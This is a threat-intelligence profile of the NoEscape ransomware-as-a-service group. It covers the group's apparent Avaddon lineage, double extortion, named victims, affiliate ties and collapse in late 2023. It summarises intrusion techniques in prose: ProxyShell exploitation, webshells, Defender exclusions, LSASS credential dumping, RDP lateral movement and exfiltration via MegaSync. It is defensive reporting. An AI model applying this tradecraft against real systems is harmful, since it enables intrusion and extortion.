NoEscape

NoEscape is a financially motivated ransomware-as-a-service (RaaS) operation first observed in May 2023 and widely reported as a rebrand or spin-off of Avaddon. It uses double extortion, combining data theft with file encryption, and some reporting notes additional extortion options such as DDoS/spam and call-center support. The group is described as avoiding targets in the former Soviet Union. Within seven months, NoEscape reportedly listed 145 compromised organizations on its leak site, and one source attributed 4.4% of observed incidents (9 incidents) to the group. Observed delivery and intrusion methods in the provided content include malicious file downloads and infected email attachments, exploitation of public-facing Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) leading to webshell deployment, use of PowerShell to add Microsoft Defender exclusions, credential dumping from LSASS, and lateral movement primarily via RDP using valid domain credentials. Additional reported tooling and techniques include Plink to tunnel RDP over SSH, TeamViewer for access, MegaSync for exfiltration to Mega, scheduled-task execution via "SystemUpdate," and in another case use of NPPSPY to capture cleartext Exchange credentials, followed by RDP-based lateral movement and likely data exfiltration. One forensic account specifically states NoEscape performed lateral movement via RDP with a domain admin account. Victims and claimed victims mentioned in the content include the University of Hawaii, where NoEscape claimed in June 2023 to have stolen 65GB of sensitive data; the International Joint Commission, which NoEscape listed on September 7 and claimed to have stolen 80GB of data from; Italian technical consultancy Kreacta; Lithuania’s Republican Vilnius Psychiatric Hospital; Taiwanese manufacturer Avertronics; and an October 2023 incident referenced in relation to the Order of Psychologists of the Lombardy Region. The content also notes unconfirmed monitoring linking NoEscape activity to powerhousenow.com in late 2023. The group’s ecosystem relationships in the content include LockBitSupp encouraging NoEscape and ALPHV affiliates in late 2023 to use the LockBit leak site after disruption to rival groups. The content also states Iranian threat actors have been observed working as affiliates with Russian ransomware gangs including NoEscape, RansomHouse, and ALPHV, and that the FBI observed Iranian actors partnering with affiliates of NoEscape and taking a percentage of ransom payments. Separately, Prodaft reporting cited in the content says Mikhail Matveev (Wazawaka) worked as an affiliate of NoEscape. The content indicates NoEscape’s operations degraded in late 2023: it had not reported new victims after December 4, 2023, affiliates allegedly accused the operators of an exit scam involving ransom payments worth millions, and the group reportedly took down its leak site and lost affiliate trust. Known alias in the provided content: Avaddon (reported rebrand/spin-off relationship).